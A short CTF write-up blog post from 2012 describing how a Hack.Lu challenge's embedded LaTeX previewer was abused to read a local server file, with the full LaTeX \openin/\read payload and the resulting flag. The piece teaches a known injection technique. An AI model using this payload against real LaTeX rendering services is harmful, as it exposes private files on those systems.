Delusions of Grandeur (NetSec) Blog: Hack.Lu CTF: it's not scientific without LaTeX Writeup

The objective of this challenge was to leverage an embedded LaTeX previewer to access a local file.

Having very little experience with LaTeX, I googled around for a bit and stumbled on this paper: LaTeX Hacking

The paper describes how LaTeX previewers often make a system vulnerable because they are allowed to read and print local files as so (note the \hfill to make the line wrap):

\openin5=/home/awesker/cure
\def\readfile{%
     \read5 to\curline
     \ifeof5 \let\next=\relax
     \else \curline˜\\
           \let\next=\readfile
           \fi
\next}%
\ifeof5 Couldn't read the file!%
\else \hfill \readfile \closein5
\fi

The font was fairly small, so I also included the following above the loop to make the flag readable:

\fontsize{20}{15}
\selectfont

Yay! The flag was embedded in the document now!

Flag = gtttatgtagcttaccccctcaaagcaatacactgaaaatgtttcgacgggtttacatcaccccataaacaaacaggtttggtcctagcctttctattag

-- d1r3w0lf

Delusions of Grandeur (NetSec) Blog

Friday, October 26, 2012

Hack.Lu CTF: it's not scientific without LaTeX Writeup

No comments:

Post a Comment